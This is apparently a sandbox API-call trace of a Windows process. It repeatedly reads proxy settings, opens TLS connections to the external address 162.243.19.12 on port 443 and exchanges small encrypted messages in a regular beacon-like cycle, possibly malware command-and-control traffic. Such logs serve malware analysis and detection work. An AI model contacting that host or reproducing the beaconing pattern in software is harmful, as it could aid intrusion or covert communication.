	[0224.849] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e48e0140*), (len=0xd5, buf=0x233e48e2c88*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e48e0140*), (len=0xd5, buf=0x233e48e2c88*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0224.850] CoTaskMemFree (pv=0x233fc64fcf0) 
	[0224.850] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0224.850] recv (in: s=0x7cc, buf=0x233e48e3028, len=5, flags=0 | out: buf=0x233e48e3028*) returned 5
	[0225.369] recv (in: s=0x7cc, buf=0x233e48e304d, len=1488, flags=0 | out: buf=0x233e48e304d*) returned 1488
	[0225.369] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48e3730, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48e3730, pfQOP=0x0) returned 0x0
	[0225.369] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0225.369] SetEvent (hEvent=0x6b4) returned 1
	[0225.396] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0240.401] CloseHandle (hObject=0xa80) returned 1
	[0240.657] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0240.658] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0240.658] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0240.658] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0240.659] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0240.659] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0240.659] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0240.660] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0240.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0240.660] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0240.661] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0240.661] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689da0
	[0240.661] WinHttpSetTimeouts (hInternet=0x233fc689da0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0240.662] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0240.675] SetEvent (hEvent=0x6b4) returned 1
	[0240.676] select (in: nfds=0, readfds=0x233e48eb128, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48eb128, writefds=0x0, exceptfds=0x0) returned 1
	[0240.677] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0240.678] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0240.679] shutdown (s=0x7cc, how=2) returned 0
	[0240.690] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0240.690] closesocket (s=0x7cc) returned 0
	[0240.692] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0240.692] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0240.693] WSAConnect (in: s=0x7cc, name=0x233e48ec8c0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0240.801] closesocket (s=0xa58) returned 0
	[0240.802] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48e9868, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48ed148, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48ed148, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0240.803] FreeContextBuffer (in: pvContextBuffer=0x233fc687b80 | out: pvContextBuffer=0x233fc687b80) returned 0x0
	[0240.803] send (in: s=0x7cc, buf=0x233e48ed218*, len=333, flags=0 | out: buf=0x233e48ed218*) returned 333
	[0240.803] recv (in: s=0x7cc, buf=0x233e48ed218, len=5, flags=0 | out: buf=0x233e48ed218*) returned 5
	[0240.909] recv (in: s=0x7cc, buf=0x233e48ed21d, len=49, flags=0 | out: buf=0x233e48ed21d*) returned 49
	[0240.910] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48e9868, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48ed458, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48ed478, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48ed478, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0240.911] recv (in: s=0x7cc, buf=0x233e48ed568, len=5, flags=0 | out: buf=0x233e48ed568*) returned 5
	[0240.911] recv (in: s=0x7cc, buf=0x233e48ed58d, len=1, flags=0 | out: buf=0x233e48ed58d*) returned 1
	[0240.911] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48e9868, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48ed660, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48ed680, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48ed680, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0240.911] recv (in: s=0x7cc, buf=0x233e48ed770, len=5, flags=0 | out: buf=0x233e48ed770*) returned 5
	[0240.911] recv (in: s=0x7cc, buf=0x233e48ed795, len=48, flags=0 | out: buf=0x233e48ed795*) returned 48
	[0240.912] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48e9868, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48ed898, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48ed8b8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48ed8b8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0240.913] FreeContextBuffer (in: pvContextBuffer=0x233e399bc20 | out: pvContextBuffer=0x233e399bc20) returned 0x0
	[0240.913] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48eda00 | out: pBuffer=0x233e48eda00) returned 0x0
	[0240.914] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48eda58 | out: pBuffer=0x233e48eda58) returned 0x0
	[0240.914] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48edac0 | out: pBuffer=0x233e48edac0) returned 0x0
	[0240.914] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0240.915] CertDuplicateStore (hCertStore=0x233fc6824b0) returned 0x233fc6824b0
	[0240.915] CertEnumCertificatesInStore (hCertStore=0x233fc6824b0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0240.915] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0240.915] CertEnumCertificatesInStore (hCertStore=0x233fc6824b0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0240.915] CertCloseStore (hCertStore=0x233fc6824b0, dwFlags=0x0) returned 1
	[0240.916] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0240.917] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683760
	[0240.917] CertAddCRLLinkToStore (in: hCertStore=0x233fc683760, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0240.917] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683760, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0240.919] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0240.920] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0240.921] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0240.922] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0240.922] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0240.922] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0240.922] SetLastError (dwErrCode=0x0) 
	[0240.922] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0240.923] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0240.923] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0240.924] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48f06c8, MessageSeqNo=0x0 | out: pMessage=0x233e48f06c8) returned 0x0
	[0240.924] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fb40
	[0240.924] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e48ed988*), (len=0xd5, buf=0x233e48f04d0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e48ed988*), (len=0xd5, buf=0x233e48f04d0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0240.925] CoTaskMemFree (pv=0x233fc64fb40) 
	[0240.927] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0240.927] recv (in: s=0x7cc, buf=0x233e48f0870, len=5, flags=0 | out: buf=0x233e48f0870*) returned 5
	[0241.383] recv (in: s=0x7cc, buf=0x233e48f0895, len=1488, flags=0 | out: buf=0x233e48f0895*) returned 1488
	[0241.383] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48f0f78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48f0f78, pfQOP=0x0) returned 0x0
	[0241.384] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0241.385] SetEvent (hEvent=0x6b4) returned 1
	[0241.429] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0259.434] CloseHandle (hObject=0xa80) returned 1
	[0259.621] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0259.621] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0259.622] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0259.622] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0259.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0259.623] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0259.623] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0259.624] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0259.624] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0259.624] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0259.624] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0259.625] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68bb60
	[0259.625] WinHttpSetTimeouts (hInternet=0x233fc68bb60, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0259.625] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0259.639] SetEvent (hEvent=0x6b4) returned 1
	[0259.639] select (in: nfds=0, readfds=0x233e48f8970, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48f8970, writefds=0x0, exceptfds=0x0) returned 1
	[0259.640] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0259.641] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0259.641] shutdown (s=0x7cc, how=2) returned 0
	[0259.643] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0259.643] closesocket (s=0x7cc) returned 0
	[0259.644] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0259.644] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0259.645] WSAConnect (in: s=0x7cc, name=0x233e48fa108*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0259.754] closesocket (s=0xa58) returned 0
	[0259.754] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48f70b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48fa990, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48fa990, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0259.755] FreeContextBuffer (in: pvContextBuffer=0x233fc687fd0 | out: pvContextBuffer=0x233fc687fd0) returned 0x0
	[0259.755] send (in: s=0x7cc, buf=0x233e48faa60*, len=333, flags=0 | out: buf=0x233e48faa60*) returned 333
	[0259.755] recv (in: s=0x7cc, buf=0x233e48faa60, len=5, flags=0 | out: buf=0x233e48faa60*) returned 5
	[0259.861] recv (in: s=0x7cc, buf=0x233e48faa65, len=49, flags=0 | out: buf=0x233e48faa65*) returned 49
	[0259.861] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48f70b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48faca0, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48facc0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48facc0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0259.861] recv (in: s=0x7cc, buf=0x233e48fadb0, len=5, flags=0 | out: buf=0x233e48fadb0*) returned 5
	[0259.861] recv (in: s=0x7cc, buf=0x233e48fadd5, len=1, flags=0 | out: buf=0x233e48fadd5*) returned 1
	[0259.862] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48f70b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48faea8, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48faec8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48faec8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0259.862] recv (in: s=0x7cc, buf=0x233e48fafb8, len=5, flags=0 | out: buf=0x233e48fafb8*) returned 5
	[0259.862] recv (in: s=0x7cc, buf=0x233e48fafdd, len=48, flags=0 | out: buf=0x233e48fafdd*) returned 48
	[0259.862] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48f70b0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48fb0e0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48fb100, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48fb100, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0259.863] FreeContextBuffer (in: pvContextBuffer=0x233e399b800 | out: pvContextBuffer=0x233e399b800) returned 0x0
	[0259.863] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48fb248 | out: pBuffer=0x233e48fb248) returned 0x0
	[0259.863] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48fb2a0 | out: pBuffer=0x233e48fb2a0) returned 0x0
	[0259.864] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48fb308 | out: pBuffer=0x233e48fb308) returned 0x0
	[0259.864] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0259.864] CertDuplicateStore (hCertStore=0x233fc683760) returned 0x233fc683760
	[0259.864] CertEnumCertificatesInStore (hCertStore=0x233fc683760, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0259.864] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0259.864] CertEnumCertificatesInStore (hCertStore=0x233fc683760, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0259.865] CertCloseStore (hCertStore=0x233fc683760, dwFlags=0x0) returned 1
	[0259.865] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0259.866] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6820a0
	[0259.866] CertAddCRLLinkToStore (in: hCertStore=0x233fc6820a0, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0259.866] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc6820a0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0259.867] CertDuplicateCertificateChain (pChainContext=0x233fc6fee10) returned 0x233fc6fee10
	[0259.869] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0259.869] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0259.870] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0259.870] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0259.871] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0259.871] SetLastError (dwErrCode=0x0) 
	[0259.871] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0259.871] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0259.871] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0259.872] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48fdf10, MessageSeqNo=0x0 | out: pMessage=0x233e48fdf10) returned 0x0
	[0259.872] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fba0
	[0259.872] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fba0*=((len=0x3b, buf=0x233e48fb1d0*), (len=0xd5, buf=0x233e48fdd18*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fba0*=((len=0x3b, buf=0x233e48fb1d0*), (len=0xd5, buf=0x233e48fdd18*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0259.873] CoTaskMemFree (pv=0x233fc64fba0) 
	[0259.873] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0259.873] recv (in: s=0x7cc, buf=0x233e48fe0b8, len=5, flags=0 | out: buf=0x233e48fe0b8*) returned 5
	[0260.328] recv (in: s=0x7cc, buf=0x233e48fe0dd, len=1488, flags=0 | out: buf=0x233e48fe0dd*) returned 1488
	[0260.328] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48fe7c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48fe7c0, pfQOP=0x0) returned 0x0
	[0260.328] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0260.328] SetEvent (hEvent=0x6b4) returned 1
	[0260.355] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0279.360] CloseHandle (hObject=0xa80) returned 1
	[0279.517] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0279.517] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa5c) returned 0x0
	[0279.518] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0279.518] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0279.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x25c) returned 0x0
	[0279.518] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0279.519] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0279.519] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa70) returned 0x0
	[0279.519] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0279.519] RegNotifyChangeKeyValue (hKey=0xa70, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0279.520] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x394) returned 1
	[0279.520] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68aea0
	[0279.520] WinHttpSetTimeouts (hInternet=0x233fc68aea0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0279.520] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0279.535] SetEvent (hEvent=0x6b4) returned 1
	[0279.535] select (in: nfds=0, readfds=0x233e49061e8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e49061e8, writefds=0x0, exceptfds=0x0) returned 1
	[0279.536] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0279.537] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0279.537] shutdown (s=0x7cc, how=2) returned 0
	[0279.548] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0279.548] closesocket (s=0x7cc) returned 0
	[0279.550] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0279.550] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0279.551] WSAConnect (in: s=0x7cc, name=0x233e4907980*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0279.658] closesocket (s=0xa58) returned 0
	[0279.659] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4904928, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4908208, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4908208, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0279.660] FreeContextBuffer (in: pvContextBuffer=0x233fc686760 | out: pvContextBuffer=0x233fc686760) returned 0x0
	[0279.660] send (in: s=0x7cc, buf=0x233e49082d8*, len=333, flags=0 | out: buf=0x233e49082d8*) returned 333
	[0279.661] recv (in: s=0x7cc, buf=0x233e49082d8, len=5, flags=0 | out: buf=0x233e49082d8*) returned 5
	[0279.767] recv (in: s=0x7cc, buf=0x233e49082dd, len=49, flags=0 | out: buf=0x233e49082dd*) returned 49
